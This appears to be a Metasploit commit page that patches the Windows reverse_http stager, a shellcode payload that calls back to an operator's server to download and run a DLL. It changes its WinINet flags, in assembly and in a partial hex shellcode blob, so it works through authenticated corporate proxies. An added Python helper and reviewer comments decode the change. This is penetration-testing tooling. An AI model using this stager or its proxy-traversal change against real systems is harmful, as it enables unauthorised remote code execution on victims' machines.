Allow HTTP stager to work with authenticated proxies

The HttpOpenRequest function from WinINet requires the
INTERNET_FLAG_KEEP_CONNECTION flag to communicate through an
authenticated proxy.

From MSDN (http://tinyurl.com/chwt86j):

"Uses keep-alive semantics, if available, for the connection. This
 flag is required for Microsoft Network (MSN), NT LAN Manager (NTLM),
 and other types of authentication."

Without this flag, the HTTP stager will fail when faced with a proxy
that requires authentication. The Windows HTTPS stager does not have
this problem.

For HTTP Meterpreter to communicate through an authenticated proxy a
separate patch will need to be made to the Meterpreter source code.
This is at line 1125 of source/common/core.c in the Meterpreter source
code.

My motivation for this request is for windows/dllinject/reverse_http
to download a DLL even when faced with an authenticated proxy. These
changes accomplish this.

Test environment:

I staged a SmoothWall device with the Advanced Proxy Web Add-on. I
enabled Integrated Windows Authentication with a W2K3 DC. I verified
the HTTP stager authenticated to and communicated through the proxy
by watching the proxy access.log.
bug/bundler_fix
Raphael Mudge 2013-02-24 17:33:00 -05:00
parent 0977d1a9b0
commit 788c96566f
2 changed files with 4 additions and 3 deletions
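The Ruby module in this commit embeds the stager as pre-assembled bytes, so the flag change has to be made twice: once in the assembly source and once as a hand-patched byte in the blob. The following is an added example (not part of the commit or of Metasploit) that a reviewer or analyst can use to confirm the two stay in sync: it decodes the `push imm32` operand that feeds HttpOpenRequest's dwFlags into named WinINet flags. The 16-byte fragments are taken verbatim from the diff below; the linear scan for the 0x68 opcode is a heuristic, not a disassembler, so the helper filters for operands that decode cleanly into known flag bits.

```python
import struct

# WinINet dwFlags bits as defined in the public wininet.h header.
WININET_FLAGS = {
    "INTERNET_FLAG_RELOAD": 0x80000000,
    "INTERNET_FLAG_NO_CACHE_WRITE": 0x04000000,
    "INTERNET_FLAG_KEEP_CONNECTION": 0x00400000,
    "INTERNET_FLAG_NO_AUTO_REDIRECT": 0x00200000,
    "INTERNET_FLAG_NO_UI": 0x00000200,
}

PUSH_IMM32 = 0x68  # x86 opcode: push imm32 (operand is little-endian)

# The two 16-byte lines of the stager blob as they appear in the diff below
# (before and after this commit); copied from the page, not constructed.
OLD_STAGER_FRAGMENT = (b"\x52\x68\x00\x02\x20\x84\x52\x52"
                       b"\x52\x51\x52\x50\x68\xEB\x55\x2E")
NEW_STAGER_FRAGMENT = (b"\x52\x68\x00\x02\x60\x84\x52\x52"
                       b"\x52\x51\x52\x50\x68\xEB\x55\x2E")


def flags_from_names(names):
    """OR together the named WinINet flags into a dwFlags value."""
    value = 0
    for name in names:
        value |= WININET_FLAGS[name]
    return value


def decode_flags(value):
    """Split a dwFlags value into (sorted known flag names, leftover bits)."""
    names = [n for n, bit in WININET_FLAGS.items() if value & bit]
    leftover = value & ~flags_from_names(names) & 0xFFFFFFFF
    return sorted(names), leftover


def encode_push(value):
    """Emit the 5-byte `push imm32` encoding for a dwFlags value."""
    return bytes([PUSH_IMM32]) + struct.pack("<I", value)


def push_imm32_operands(blob):
    """Yield (offset, imm32) for every 0x68 followed by four bytes.

    This is a naive scan: a data byte 0x68 also matches, so callers must
    filter the results rather than trust every hit."""
    for i in range(len(blob) - 4):
        if blob[i] == PUSH_IMM32:
            yield i, struct.unpack_from("<I", blob, i + 1)[0]


def find_httpopenrequest_flags(blob):
    """Return (offset, value, names) for pushes that look like the dwFlags
    argument: every set bit is a known WinINet flag and RELOAD is present."""
    hits = []
    for offset, imm in push_imm32_operands(blob):
        names, leftover = decode_flags(imm)
        if leftover == 0 and "INTERNET_FLAG_RELOAD" in names:
            hits.append((offset, imm, names))
    return hits


def has_keep_connection(blob):
    """True if the stager's dwFlags push includes INTERNET_FLAG_KEEP_CONNECTION."""
    return any("INTERNET_FLAG_KEEP_CONNECTION" in names
               for _, _, names in find_httpopenrequest_flags(blob))


if __name__ == "__main__":
    for label, blob in (("old", OLD_STAGER_FRAGMENT), ("new", NEW_STAGER_FRAGMENT)):
        for offset, value, names in find_httpopenrequest_flags(blob):
            print(f"{label}: offset {offset} push 0x{value:08X} -> {', '.join(names)}")
```

Running the script prints the old fragment as `push 0x84200200` (RELOAD | NO_CACHE_WRITE | NO_AUTO_REDIRECT | NO_UI) and the new one as `push 0x84600200`, which adds KEEP_CONNECTION; `encode_push` gives the exact bytes a module author should expect to see in the blob after changing the assembly.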

@ -49,11 +49,12 @@ httpopenrequest:
pop ecx
xor edx, edx ; NULL
push edx ; dwContext (NULL)
push (0x80000000 | 0x04000000 | 0x00200000 | 0x00000200) ; dwFlags
push (0x80000000 | 0x04000000 | 0x00200000 | 0x00000200 | 0x00400000) ; dwFlags
;0x80000000 | ; INTERNET_FLAG_RELOAD
;0x04000000 | ; INTERNET_NO_CACHE_WRITE
;0x00200000 | ; INTERNET_FLAG_NO_AUTO_REDIRECT
;0x00000200 ; INTERNET_FLAG_NO_UI
;0x00000200 | ; INTERNET_FLAG_NO_UI
;0x00400000 ; INTERNET_FLAG_KEEP_CONNECTION
push edx ; accept types
push edx ; referrer
push edx ; version
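Review bot: the comment line `;0x04000000 | ; INTERNET_NO_CACHE_WRITE` misspells the constant; wininet.h names it INTERNET_FLAG_NO_CACHE_WRITE, and since this comment block is the only documentation of what the 0x84600200 literal means, it is worth correcting while the block is being touched. The added bit 0x00400000 is the correct value of INTERNET_FLAG_KEEP_CONNECTION, and the trailing `|` added to the NO_UI line keeps the comment block mirroring the expression on the `push` line. Per the commit message this only lets the stager itself authenticate; the dwFlags used by the stage's own WinINet calls in source/common/core.c need the same bit in a separate change.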

@ -47,7 +47,7 @@ module Metasploit3
"\xFF\xD5\x31\xFF\x57\x57\x57\x57\x6A\x00\x54\x68\x3A\x56\x79\xA7" +
"\xFF\xD5\xEB\x4B\x5B\x31\xC9\x51\x51\x6A\x03\x51\x51\x68\x5C\x11" +
"\x00\x00\x53\x50\x68\x57\x89\x9F\xC6\xFF\xD5\xEB\x34\x59\x31\xD2" +
"\x52\x68\x00\x02\x20\x84\x52\x52\x52\x51\x52\x50\x68\xEB\x55\x2E" +
"\x52\x68\x00\x02\x60\x84\x52\x52\x52\x51\x52\x50\x68\xEB\x55\x2E" +
"\x3B\xFF\xD5\x89\xC6\x6A\x10\x5B\x31\xFF\x57\x57\x57\x57\x56\x68" +
"\x2D\x06\x18\x7B\xFF\xD5\x85\xC0\x75\x1A\x4B\x74\x10\xEB\xE9\xEB" +
"\x49\xE8\xC7\xFF\xFF\xFF\x2F\x31\x32\x33\x34\x35\x00\x68\xF0\xB5" +
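Review bot: the single changed byte (0x20 to 0x60 in `\x68\x00\x02\x60\x84`) is the little-endian operand of `push 0x84600200`, which is 0x84200200 | 0x00400000 and so matches the assembly change in the other file. Because this module carries the pre-assembled bytes rather than assembling the .asm at build time, the two copies are kept in sync by hand; a comment beside the blob recording the asm source it was assembled from, or a test that reassembles the source and compares the bytes, would catch future drift. Confirm as well that no other module embeds a copy of the same HTTP stager bytes that would also need this patch.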